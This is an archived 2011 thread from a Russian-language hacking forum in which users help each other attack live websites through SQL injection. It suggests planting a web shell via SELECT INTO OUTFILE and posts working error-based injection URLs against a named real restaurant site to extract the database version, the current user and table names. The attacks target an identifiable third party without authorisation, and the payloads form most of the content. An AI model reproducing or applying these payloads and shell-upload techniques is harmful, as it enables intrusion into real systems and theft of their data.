ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.02.2011, 00:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
22665
Репутация:
-6
|
|
Сообщение от None
Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).
Какие сейчас есть варианты получения шела?
Проверь файловые привилегии, и залей шелл через скуль.
|
|
|
|
20.02.2011, 01:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
23579
Репутация:
-5
|
|
Сообщение от /Montana
/Montana said:
Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).
Какие сейчас есть варианты получения шела?
select ' into outfile '(найди путь к папки где стоит права 777)'
|
|
|
|
20.02.2011, 01:53
|
|
Познающий
Регистрация: 26.10.2007
Сообщений: 83
Провел на форуме:
335555
Репутация:
45
|
|
Сообщение от Vollkorn
Vollkorn said:
Проверь файловые привилегии, и залей шелл через скуль.
Можешь поподробнее описать, как проверить привелегии и как правильно составить запрос.
Дира где находиться сайт /home/.sites/site1/
|
|
|
20.02.2011, 02:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
225312
Репутация:
-6
|
|
раскажите про xpatch injection?
|
|
|
|
20.02.2011, 13:05
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799
Репутация:
62
|
|
Сообщение от boortyhuhtyu
boortyhuhtyu said:
раскажите про xpatch injection?
|
|
|
|
20.02.2011, 16:34
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Помогите определить версию БД.
http://www.menupix.com/losangeles/restaurants.php?id=-204431+%6f%72%64%65%72+by+3+--+
|
|
|
|
20.02.2011, 16:50
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Код:
Code:
http://www.menupix.com/losangeles/restaurants.php?id=1+and+%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
|
|
|
|
20.02.2011, 17:02
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Seravin
Seravin said:
Код:
Code:
http://www.menupix.com/losangeles/restaurants.php?id=1+and+%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
Как вывести имя юзера?
|
|
|
|
20.02.2011, 17:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Сообщение от FlaktW
FlaktW said:
Как вывести имя юзера?
Код:
Code:
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat(user(),floor(rand(0)*%202))having+min(0)+or+1
|
|
|
|
20.02.2011, 18:29
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Фараон
Фараон said:
Код:
Code:
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat(user(),floor(rand(0)*%202))having+min(0)+or+1
Каким запросом можно вывести название таблиц?
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat((SELECT+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1)),floor(rand (0)*%202))having+min(0)+or+1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
